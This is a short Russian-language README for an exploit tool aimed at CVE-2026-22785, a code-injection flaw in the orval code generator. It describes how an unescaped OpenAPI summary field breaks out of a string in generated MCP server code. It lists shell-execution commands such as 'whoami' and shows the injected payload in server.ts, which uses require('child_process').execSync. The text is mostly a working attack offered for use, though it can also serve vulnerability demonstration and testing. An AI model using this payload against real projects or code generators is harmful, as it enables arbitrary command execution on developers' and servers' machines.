
Эксплойт-инструмент для CVE-2026-22785, критической инъекции кода в orval < 7.18.0. Обеспечивает выполнение shell-команд и сканирование файлов для демонстрации уязвимости и проверки инъекции полезной нагрузки.
orval < 7.18.0 при генерации кода MCP-сервера напрямую вставляет поле summary спецификации OpenAPI в шаблон без экранирования, что приводит к внедрению кода.
cd exploit
npm install
# Выполнение команды (эксплуатация уязвимости)
python cve_tool.py shell <команда>
# Пример
python cve_tool.py shell whoami
python cve_tool.py shell "node --version"
python cve_tool.py shell dir
# Сканирование файла
python cve_tool.py scan <файл>
<вывод команды>
[+] CVE-2026-22785: Payload успешно внедрён
[+] Место внедрения: server.ts:31
Сгенерированный код server.ts:
server.tool(
'getApiDemo',
'API.' + require('child_process').execSync('whoami', {}),//',
getApiDemoHandler
);